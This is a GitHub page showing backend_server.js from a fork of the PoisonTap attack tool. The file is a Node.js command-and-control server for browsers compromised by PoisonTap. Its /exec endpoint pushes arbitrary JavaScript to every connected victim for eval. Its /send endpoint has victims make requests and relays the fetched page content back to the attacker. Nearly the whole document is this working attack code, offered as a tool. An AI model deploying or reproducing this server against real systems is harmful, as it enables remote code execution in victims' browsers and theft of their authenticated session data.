forked from samyk/poisontap
-
Notifications
You must be signed in to change notification settings - Fork 0
/
backend_server.js
93 lines (84 loc) · 2.42 KB
/
backend_server.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
// PoisonTap by Samy Kamkar - https://samy.pl/poisontap
//var _ = require('underscore')
var WebSocketServer = require('websocket').server
var webSocketsServerPort = 1337
var http = require('http')
var conns = []
var gr
var server = http.createServer((request, response) => {
console.log((new Date()) + ' HTTP server. URL ' + request.url + ' requested.')
if (request.url.indexOf('/exec?') === 0)
{
response.writeHead(404, {'Content-Type': 'text/html'})
for (var i in conns)
conns[i].sendUTF(JSON.stringify({ request: 'eval', content: request.url.substr(6) }))
response.end("sent")
}
else if (request.url.indexOf('/send?') === 0)
{
response.writeHead(404, {'Content-Type': 'text/html'})
for (var i in conns)
conns[i].sendUTF('{"' + decodeURI(request.url.substr(6)).replace(/"/g, '\\"').replace(/&/g, '","').replace(/=/g,'":"') + '"}')
var checkgr = () =>
{
if (gr)
{
response.end(gr)
gr = ""
}
else
setTimeout(checkgr, 500)
}
checkgr()
}
else if (request.url === '/status')
{
response.writeHead(200, {'Content-Type': 'application/json'})
var responseObject = {
currentClients: 1234,
totalHistory: 567
}
response.end(JSON.stringify(responseObject))
}
else {
response.writeHead(404, {'Content-Type': 'text/html'})
response.end('Sorry, unknown url')
}
})
server.listen(webSocketsServerPort, () => {
console.log((new Date()) + " Server is listening on port " + webSocketsServerPort)
})
// create the server
wsServer = new WebSocketServer({
httpServer: server
})
function handleReq(obj, con)
{
if (obj.request === 'getresponse')
gr = obj.html
}
wsServer.on('request', (request) => {
var obj
var connection = request.accept(null, request.origin)
conns.push(connection)
connection.on('request', (message) => {
console.log('request: ' + message)
})
connection.on('message', (message) => {
try { obj = JSON.parse(message.utf8Data) } catch(e) { }
console.log('message: ' + message.utf8Data)
console.log(obj)
if (typeof(obj) === 'object')
handleReq(obj, connection)
else
connection.sendUTF('hello')
})
// remove connection from our list
connection.on('close', connection => {
console.log('connection closed')
for (var i in conns)
if (conns[i] == connection)
//if (_.isEqual(conns[i], connection)) // XXX
conn.splice(i, 1)
})
})